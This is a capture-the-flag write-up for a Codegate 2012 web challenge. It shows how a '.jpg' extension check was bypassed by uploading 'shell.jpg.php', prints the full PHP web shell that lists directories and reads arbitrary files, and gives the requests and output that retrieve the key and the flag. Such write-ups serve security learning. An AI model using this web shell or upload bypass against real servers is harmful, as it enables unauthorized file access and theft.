This web challenge is again about uploading.
Our aim was to get shell.
Summary: upload php shell, read the key.
We need to get a shell, so it should be a good idea to upload a php script. But there’s a check on extension!
Luckily, only a presence of “.jpg” is checked, so we can upload “shell.jpg.php” file.
Let’s upload this simple shell:
shell.jpg.php:
<?php if ($_GET["d"]) print_r(scandir($_GET["d"])); if ($_GET["f"]) echo highlight_file($_GET["f"]); ?> |
With this script we can list any directory and read any file. Let’s find the key. Usually on Win servers it’s located on the user’s Desktop:
http://1.234.41.9/1olOI01/images/c6f8…4d81.php?d=c:\users
Array ( [0] => . [1] => .. [2] => All Users [3] => Default [4] => Default User [5] => Public [6] => codegate2 [7] => desktop.ini [8] => test )
http://1.234.41.9/1olOI01/images/c6f8…4d81.php?d=c:\users\codegate2\desktop\
Array ( [0] => . [1] => .. [2] => APMSETUP Monitor.lnk [3] => Codegate 2012 Key.txt [4] => desktop.ini )
Yes, here it is:
http://1.234.41.9/1olOI01/images/c6f8…4d81.php?f=c:\users\codegate2\desktop\Codegate%202012%20Key.txt
<? /* Good Job ! Key is 16b7a4c5162d4dee6a0a6286cd475dfb */ ?> 1 |
The flag: 16b7a4c5162d4dee6a0a6286cd475dfb
